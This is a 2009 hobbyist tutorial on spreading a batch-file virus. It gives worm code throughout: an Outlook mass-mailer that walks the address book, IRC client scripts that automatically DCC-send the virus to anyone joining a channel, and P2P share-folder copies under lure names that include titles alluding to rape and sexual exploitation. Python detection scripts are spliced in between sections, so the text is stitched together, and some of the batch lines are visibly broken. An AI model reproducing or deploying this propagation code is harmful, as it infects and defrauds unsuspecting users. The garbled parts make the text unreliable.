Batch IRC/Outlook Spreading

cOrRuPt G3n3t!x
July 2009

Welcome back to my 3rd batch tutorial, in which we shall discuss how to spread your batch virus over IRC (Internet Relay Chat) and MS Outlook. I have seen many different methods, but these seem to be the best so far. I will show how to spread over mIRC, pIRCh, VIRC, dIRC, XiRCON, KazaA, Morpheus, LimeWire, BearShare etc. I would like to say thanks to SPTH for some of his IRC scripts, although I needed to edit some as they would not run on my system! Please remember all these scripts are working BATCH scripts!

1) MS Outlook:

MS Outlook has for many years been an excellent way of spreading virii. The actual script to spread over MS Outlook is a VBS but we shall adapt it to be able to work in batch. See below:

echo.on error resume next>>C:\MSO.vbs 
echo.dim a,b,c,d,e>>C:\MSO.vbs 
echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs 
echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs 
echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs 
echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs 
echo.set d=c.AddressLists(y)>>C:\MSO.vbs 
echo.x=1 '>>C:\MSO.vbs
echo.set e=b.CreateItem(0)>>C:\MSO.vbs
echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs 
echo.e.Recipients.Add f>>C:\MSO.vbs 
echo.e.Subject="Your Subject here">>C:\MSO.vbs 
echo.e.Body="Your Body here">>C:\MSO.vbs 
echo.f ="">>C:\MSO.vbs>>C:\MSO.vbs
call C:\MSO.vbs
Del C:\MSO.vbs

Next, to customize this script for your batch, look at lines 15, 16 and 17. You will enter the subject of your e-mail in line 15, then the main body in line 16, and finally where your virus is located in line 17.
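From the defender's side, the listing above has a recognisable shape: a batch file assembles a .vbs file line by line with echo redirection, runs it, deletes it, and the assembled script automates the Outlook address book. The following static check is an added example, not part of the original tutorial; the indicator names and the sample text are constructed for illustration.

```python
import re

# "echo.<text>>>file.vbs" lines that assemble a script one line at a time
ECHO = re.compile(r'^\s*echo[.\s](?P<body>.*?)>>\s*"?(?P<path>[^\s">]+\.vbs)', re.I)
RUN = re.compile(r'^\s*(?:call|start|cscript|wscript)\b[^\r\n]*?(?P<path>[^\s"]+\.vbs)', re.I)
DEL = re.compile(r'^\s*(?:del|erase)\b[^\r\n]*?(?P<path>[^\s"]+\.vbs)', re.I)

# Strings in the dropped script that indicate Outlook address-book automation
INDICATORS = {
    "outlook_automation": re.compile(r'CreateObject\("Outlook\.Application"\)', re.I),
    "address_book_walk": re.compile(r'AddressLists|AddressEntries', re.I),
    "recipient_add": re.compile(r'Recipients\.Add', re.I),
}

# Constructed sample: a few lines in the style of the listing above
SAMPLE = r'''echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs
echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs
echo.e.Recipients.Add f>>C:\MSO.vbs
call C:\MSO.vbs
Del C:\MSO.vbs
'''

def analyze_batch(text):
    """Return one finding per .vbs file that the batch text assembles."""
    scripts = {}
    for line in text.splitlines():
        m = ECHO.match(line)
        if m:
            entry = scripts.setdefault(
                m["path"].lower(), {"body": [], "run": False, "deleted": False})
            entry["body"].append(m["body"])
            continue
        for rx, key in ((RUN, "run"), (DEL, "deleted")):
            m = rx.match(line)
            if m and m["path"].lower() in scripts:
                scripts[m["path"].lower()][key] = True
    findings = []
    for path, entry in scripts.items():
        body = "\n".join(entry["body"])
        findings.append({
            "path": path,
            "drop_run_delete": entry["run"] and entry["deleted"],
            "indicators": sorted(n for n, rx in INDICATORS.items() if rx.search(body)),
        })
    return findings

if __name__ == "__main__":
    print(analyze_batch(SAMPLE))
```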


2) mIRC:

Next we will spread over mIRC, a well-known IRC client. mIRC has a long list of possible places it could be installed to, so let's begin:

copy %0 "%SystemDrive%\Windows\WinDef.bat"
if exist "%SystemDrive%\mirc" goto m1
if exist "%ProgramFiles%\mirc" goto m2
goto piRCh
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
echo.set scriptini=fso.CreateTextFile("C:\mirc\script.ini")>>C:\mscript.vbs 
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
echo.scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }">>C:\mscript.vbs 
echo.scriptini.WriteLine "n2=  /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
call C:\mscript.vbs
del C:\mscript.vbs
goto pIRCh
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
echo.set scriptini=fso.CreateTextFile("C:\Program Files\mirc\script.ini")>>C:\mscript.vbs 
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
echo.scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }">>C:\mscript.vbs
echo.scriptini.WriteLine "n2=  /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
call C:\mscript.vbs
del C:\mscript.vbs


Now this is a working script for mIRC. All you need to change is the GOTO parameters, according to where you want mIRC to go to, which are lines 3 and 15. Next you will also have to change where your virus is located, in lines 1, 10 and 22, near the end of the statement! All this will do is make the script in the C:\ directory, call it and then delete it.


3) pIRCh:

Another well-known IRC client which we shall spread through. See below for the working batch script:

If not exist "C:\Pirch98" goto kazaA
if exist "%SystemDrive%\Pirch98" goto p_inf
copy %0 "%SystemDrive%\Pirch98\WinDef.bat"
echo.Dim pirch>>C:\pirch.vbs
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\pirch.vbs
echo.set pirch=fso.CreateTextFile("C:\pirch98\events.ini")>>C:\pirch.vbs
echo.pirch.WriteLine "[Levels]">>C:\pirch.vbs
echo.pirch.WriteLine "Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Count=6">>C:\pirch.vbs
echo.pirch.WriteLine "Level1=000-Unknows">>C:\pirch.vbs
echo.pirch.WriteLine "000-UnknowsEnabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level2=100-Level 100">>C:\pirch.vbs
echo.pirch.WriteLine "100-Level 100Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level3=200-Level 200">>C:\pirch.vbs
echo.pirch.WriteLine "200-Level 200Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level4=300-Level 300">>C:\pirch.vbs
echo.pirch.WriteLine "300-Level 300Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level5=400-Level 400">>C:\pirch.vbs
echo.pirch.WriteLine "400-Level 400Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level6=500-Level 500">>C:\pirch.vbs
echo.pirch.WriteLine "500-Level 500Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "[000-Unknowns]">>C:\pirch.vbs
echo.pirch.WriteLine "User1=*!*@*">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=1">>C:\pirch.vbs
echo.pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\Windef.bat">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=1">>C:\pirch.vbs
echo.pirch.WriteLine "[100-Level 100]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[200-Level 200]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[300-Level 300]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[400-Level 400]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[500-Level 500]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
call C:\pirch.vbs
del C:\pirch.vbs

There is the full script. Once again, GOTO parameters need to be changed accordingly (lines 1 and last line), then also lines 4 and 26 need to be changed according to where your virus is.
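Both the mIRC script.ini and the pIRCh events.ini shown above end up with a JOIN event handler that issues a DCC send to every user who joins a channel, and that handler is what an inspection of a client's script files should look for. The following check is an added example, not part of the original tutorial; the three sample texts are constructed in the formats shown above, and the list of risky extensions is an assumption.

```python
import re

KEY = re.compile(r'^\s*(?:n\d+|Events\d+)\s*=', re.I)      # "n2=" / "Events1=" prefixes
JOIN = re.compile(r'\bon\s+(?:[^:\s]+:)?JOIN:', re.I)      # "on 1:JOIN:" and "ON JOIN:"
DCC = re.compile(r'/?\.?dcc\s+send\s+\S+\s+(?P<file>.+?)\s*(?:\}|$)', re.I)
RISKY_EXT = (".bat", ".cmd", ".exe", ".vbs", ".scr", ".pif", ".com", ".js")

# Constructed samples in the formats shown above
MIRC_SAMPLE = r"""[script]
n0=on 1:JOIN:#:{
n1=  /if ( $nick == $me ) { halt }
n2=  /.dcc send $nick c:\windows\WinDef.bat
n3=}
"""
PIRCH_SAMPLE = r"""[000-Unknowns]
User1=*!*@*
Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\Windef.bat
EventCount=1
"""
BENIGN_SAMPLE = r"""[script]
n0=on 1:JOIN:#:{
n1=  /msg $chan Welcome, $nick
n2=}
n3=alias share { /dcc send $1 c:\docs\notes.txt }
"""

def find_auto_dcc(ini_text):
    """List DCC sends that fire automatically from a JOIN event handler."""
    hits, depth, in_join = [], 0, False
    for lineno, raw in enumerate(ini_text.splitlines(), 1):
        line = KEY.sub("", raw, count=1)          # drop the INI key, keep the script text
        if JOIN.search(line):
            in_join = True
        if in_join:
            m = DCC.search(line)
            if m:
                sent = m["file"].strip('"')
                hits.append({"line": lineno, "file": sent,
                             "risky": sent.lower().endswith(RISKY_EXT)})
        depth += line.count("{") - line.count("}")
        if depth <= 0:                            # handler closed (or was a one-liner)
            depth, in_join = 0, False
    return hits

if __name__ == "__main__":
    for sample in (MIRC_SAMPLE, PIRCH_SAMPLE, BENIGN_SAMPLE):
        print(find_auto_dcc(sample))
```

A DCC send in a user-invoked alias, as in the benign sample, is not reported because it does not sit inside a JOIN handler.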


4) KazaA:

Another IRC, pretty simple; see below:

if exist "%SystemDrive%\Kazaa" goto vIRC
if exist "%SystemDrive%\Kazaa" goto kazaa_inf
copy %0 "%SystemDrive%\Kazaa"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\k.vbs
echo.set shell=CreateObject("WScript.Shell")>>C:\k.vbs "HKLM\Software\KaZaA\Transfer\DlDir0", "C:\Kazaa">>C:\k.vbs
call C:\k.vbs
del C:\k.vbs

Just make sure you copy your virus into the directory 'C:\Kazaa'!!! By now I'm sure you've got the hang of changing parameters, so go ahead, you can do it :)


5) vIRC:

We now see a similar script to the one above for vIRC; just put it under your infection routine and change the paths etc. to your batch's:

if exist "%SystemDrive%\Virc" goto v_inf
if not exist "%SystemDrive%\Virc" goto XiRCON
copy %0 "%SystemDrive%\Virc\WinDef.bat"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\v.vbs
echo.set shell=CreateObject("WScript.Shell")>>C:\v.vbs "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\WinDef.bat">>C:\v.vbs
call C:\v.vbs
del C:\v.vbs

6) XiRCON:

This is an IRC spreading technique for XiRCON; just change paths and names for your batch (thanks to SPTH):

IF EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" goto inf_xircon
IF NOT EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" GOTO dIRC
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\xi.vbs
echo.set xi=fso.CreateTextFile("C:\Default.tcl")>>C:\xi.vbs
echo.xi.writeline " on ctcp {">>C:\xi.vbs
echo.xi.writeline " foreach n [channels] {">>C:\xi.vbs
echo.xi.writeline "  if {$n != [my_nick]} {">>C:\xi.vbs
echo.xi.writeline "     /dcc send $n C:\Windows\WinDef.bat">>C:\xi.vbs
echo.xi.writeline "   }">>C:\xi.vbs
echo.xi.writeline " }">>C:\xi.vbs
echo.xi.writeline "}">>C:\xi.vbs
copy %0 "%SystemDrive%\Virc\WinDef.bat"
del /f /q "%SystemDrive%\Program Files\XiRCON\Default.tcl"
call C:\xi.vbs
del C:\xi.vbs
copy "C:\Default.tcl" "%SystemDrive%\Program Files\XiRCON\Default.tcl"


7) dIRC:

There are a few more options with this script: you can either add your new script to the existing one or make a whole new one entirely. SPTH decided to make a new one, so let us go with his advice as above; just change paths and GOTO parameters as needed by your batch:

if exist "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts" goto inf_dirc >nul
if exist not "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts" goto randomspread
copy %0 "%SystemDrive%\Windows\WinDef.bat"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\dirc.vbs
echo.set dirc=fso.CreateTextFile("C:\virus.dsf")>>C:\dirc.vbs
echo.dirc.writeline "#commands">>C:\dirc.vbs
echo.dirc.writeline "#VBScript">>C:\dirc.vbs
echo.dirc.writeline "!!! Do not edit the contents of this file. !!!">>C:\dirc.vbs
echo.dirc.writeline "">>C:\dirc.vbs
echo.dirc.writeline "#EVENT# vir Join     *     *     on">>C:\dirc.vbs
echo.dirc.writeline "sendcommand /dcc send  & Nick &  C:\Windows\WinDef.bat">>C:\dirc.vbs
echo.dirc.writeline "===">>C:\dirc.vbs
call C:\dirc.vbs
del C:\dirc.vbs
copy "C:\virus.dsf" "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts" >nul 
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\standard.dsf     commands     VBScript>>scripts.drc
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\virus.dsf     commands     VBScript>>scripts.drc

8) Random Share Spread:

This is just random spreading through a multitude of different shareware sites; just add it to the spread routine in your code:

COPY %0 "%SystemDrive%\mydocu~1\Crysis_keygen.exe" >nul
COPY %0 "%SystemDrive%\mydocu~1\Kaspersky_Antivirus_10_Limited_Edition.url.exe" >nul
COPY %0 "%SystemDrive%\kazaa\myshar~1\FHM_2009_MODELS.jpg.exe" >nul
COPY %0 "%ProgramFiles%\applej~1\incoming\Windows_Vista_Crack.exe" >nul
COPY %0 "%ProgramFiles%\bearsh~1\shared\XXX_SITE_PASSWORDS.exe" >nul
COPY %0 "%ProgramFiles%\eDonkey2000\incoming\Teen_Forced_To_Suck.wmv.exe" >nul
COPY %0 "%ProgramFiles%\emule\incoming\Windows7_RC1_Downloader.exe" >nul
COPY %0 "%ProgramFiles%\grokster\mygrok~1\ICE_AGE_3.wmv.exe" >nul
COPY %0 "%ProgramFiles%\icq\shared~1\Norton_AV_2009_CRACKED.exe.exe" >nul
COPY %0 "%ProgramFiles%\kazaa\myshar~1\EBONY_WHORE_RAPED.mp4.exe" >nul
COPY %0 "%ProgramFiles%\kazaal~1\myshar~1\VisualC_Keygen_2009.exe" >nul
COPY %0 "%ProgramFiles%\kmd\myshar~1\EXPLOITED_ASIANS.wmv.exe" >nul
COPY %0 "%ProgramFiles%\limewire\shared\ASS_LICKERS.MOV.exe" >nul
COPY %0 "%ProgramFiles%\morpheus\myshar~1\Hard_Russian_rape.wmv.exe" >nul
COPY %0 "%ProgramFiles%\overnet\bundles\Virgins_1st_fuck.mp4.exe" >nul
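Files planted this way carry two detectable marks: a bait extension in front of the real one, which Windows hides when known extensions are not shown, and content that is batch text rather than a PE image, because COPY %0 only renames the script. The following share-folder scan is an added example, not part of the original tutorial; the extension sets and the demo files are constructed for illustration.

```python
import os
import tempfile

PE_EXT = {".exe", ".scr"}                       # extensions that should hold a PE image
DECOY_EXT = {".jpg", ".wmv", ".mp4", ".mov", ".url", ".exe"}   # inner extensions used as bait

def inspect_file(path):
    """Return the reasons a file in a share folder looks like a disguised script."""
    stem, ext = os.path.splitext(os.path.basename(path).lower())
    if ext not in PE_EXT:
        return []
    reasons = []
    if os.path.splitext(stem)[1] in DECOY_EXT:
        reasons.append("double_extension")
    with open(path, "rb") as fh:
        if fh.read(2) != b"MZ":                 # every PE file starts with the DOS "MZ" magic
            reasons.append("not_a_pe_image")
    return reasons

def scan_share(root):
    """Walk a share folder and map each suspicious relative path to its reasons."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                reasons = inspect_file(full)
            except OSError:
                continue                        # unreadable file: skip it
            if reasons:
                report[os.path.relpath(full, root)] = reasons
    return report

def demo():
    """Build a constructed share folder in a temp directory and scan it."""
    files = {
        "ICE_AGE_3.wmv.exe": b"@echo off\r\n",  # batch text under an .exe name
        "Crysis_keygen.exe": b"@echo off\r\n",
        "setup.exe": b"MZ\x90\x00",             # starts like a real PE image
        "holiday.jpg": b"\xff\xd8\xff\xe0",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in files.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return scan_share(root)

if __name__ == "__main__":
    print(demo())
```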

I have been writing this tutorial for well over 2 hours now, so it's time for me to go. Be sure to look out for my next tutorial, coming soon. This weekend I'm just relaxing, but it will most likely be a theory on batch keylogging, and is definitely worth a look. If you have any bugs or queries, e-mail them to me at [email protected] and I'll do my best to help. Remember this is for educational purpose only! ;) Keep on coding!! This is Corrupt Genetix signing out.

